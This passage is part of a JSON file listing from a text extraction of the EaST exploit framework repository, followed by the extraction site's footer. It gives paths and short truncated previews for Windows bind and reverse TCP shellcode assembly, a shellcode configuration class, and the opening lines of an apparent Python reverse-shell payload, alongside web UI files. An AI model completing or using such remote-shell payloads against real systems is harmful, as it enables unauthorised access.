"preview": "BITS 32\n cld\n call start\napi_call:\n pushad\n mov ebp, esp\n xor edx, edx\n mov edx, [fs:edx+48]\n mov edx, [edx+12]\n "
},
{
"path": "shellcodes/data/windows/src/reverse_tcp.asm",
"chars": 2173,
"preview": "global _start\n_start:\n\tcld\n\tcall main\n\tpusha\n\tmov ebp,esp\n\txor eax,eax\n\tmov edx,DWORD [fs:eax+0x30]\n\tmov edx,DWORD [ed"
},
{
"path": "shellcodes/data/windows/x64/src/bind_tcp.asm",
"chars": 2797,
"preview": "[BITS 64]\n cld\n and rsp, 0xFFFFFFFFFFFFFFF0\n call start\napi_call:\n push r9\n push r8\n push rdx\n push rcx\n push rs"
},
{
"path": "shellcodes/data/windows/x64/src/reverse_tcp.asm",
"chars": 2608,
"preview": "[BITS 64]\n cld\n and rsp, 0xFFFFFFFFFFFFFFF0\n call start\napi_call:\n push r9\n push r8\n push rdx\n push rcx\n push rs"
},
{
"path": "shellcodes/shellcode.py",
"chars": 620,
"preview": "class Shellcode:\n def __init__(self, os_target='', os_target_arch='', connectback_ip='localhost', connectback_port=55"
},
{
"path": "shellcodes/shellcode_payload.py",
"chars": 790,
"preview": "#!/usr/bin/python\nimport socket,subprocess\nHOST = '127.0.0.1' # The remote host\nPORT = 5555 # The same por"
},
{
"path": "start.py",
"chars": 4941,
"preview": "import os, sys\nimport threading\nimport logging\nimport BaseHTTPServer\nfrom ui.httpd import HTTPRequestHandler\nimport sub"
},
{
"path": "ui/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "ui/css/codemirror.css",
"chars": 7324,
"preview": "/* BASICS */\n\n.CodeMirror {\n /* Set height, width, borders, and global font properties here */\n font-family: monospace"
},
{
"path": "ui/css/main.css",
"chars": 3814,
"preview": "* {\n\tbox-sizing: border-box;\n}\n.text-white {\n color: white;\n}\n.text-danger {\n color: #a94442 !important;\n}\n\n.modal"
},
{
"path": "ui/httpd.py",
"chars": 7492,
"preview": "\"\"\"Simple HTTP Server.\nThis module builds on BaseHTTPServer by implementing the standard GET\nand HEAD requests in a fair"
},
{
"path": "ui/index.html",
"chars": 5096,
"preview": "\n<html>\n <head>\n <meta charset=\"utf-8\"/>\n <title>EaST Framework</title>\n <link rel=\"stylesheet\" type=\"text/css"
},
{
"path": "ui/index.jade",
"chars": 4952,
"preview": "html\n head\n meta(charset=\"utf-8\")\n title EaST Framework\n script(src=\"js/jquery.min.js\")\n script(src=\"js/lod"
},
{
"path": "ui/js/codemirror.js",
"chars": 313409,
"preview": "// CodeMirror, copyright (c) by Marijn Haverbeke and others\n// Distributed under an MIT license: http://codemirror.net/L"
},
{
"path": "ui/js/components.js",
"chars": 15965,
"preview": "var treeNodeTemplate = function(){/*\n <li :class=\"{'hidden': !visible}\" @click=\"select\" @dblclick=\"run\">\n <span v-if=\""
},
{
"path": "ui/js/guiCommands.js",
"chars": 2081,
"preview": "var GuiCommandsHandler = function() {\n};\n\nGuiCommandsHandler.prototype = {\n hello: function(callback) {\n var d"
},
{
"path": "ui/js/main.js",
"chars": 9700,
"preview": "toastr.options.timeOut = 1000;\n\n$(document).ready(function() {\n mainVue = new Vue({\n el: '#mainVue',\n d"
},
{
"path": "ui/js/rsvp.js",
"chars": 64281,
"preview": "(function(global) {\nvar define, requireModule, require, requirejs;\n\n(function() {\n var registry = {}, seen = {};\n\n def"
},
{
"path": "ui/js/serverCommands.js",
"chars": 1389,
"preview": "function ServerCommandsHandler() {\n this.commands = {\n \"on_listener_message\": this.onListenerMessage,\n \"on_module"
},
{
"path": "ui/js/ws.js",
"chars": 4312,
"preview": "// window.onbeforeunload = function() {\n// websocketHandler.websocket.onclose = function () {}; // disable onclose h"
},
{
"path": "ui/mode/python/index.html",
"chars": 5938,
"preview": "<!doctype html>\n\n<title>CodeMirror: Python mode</title>\n<meta charset=\"utf-8\"/>\n<link rel=stylesheet href=\"../../doc/doc"
},
{
"path": "ui/mode/python/python.js",
"chars": 12906,
"preview": "// CodeMirror, copyright (c) by Marijn Haverbeke and others\n// Distributed under an MIT license: http://codemirror.net/L"
}
]
// ... and 5 more files (download for full content)
About this extraction
This page contains the full source code of the C0reL0ader/EaST GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 80 files (694.9 KB), approximately 185.8k tokens, and a symbol index with 863 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.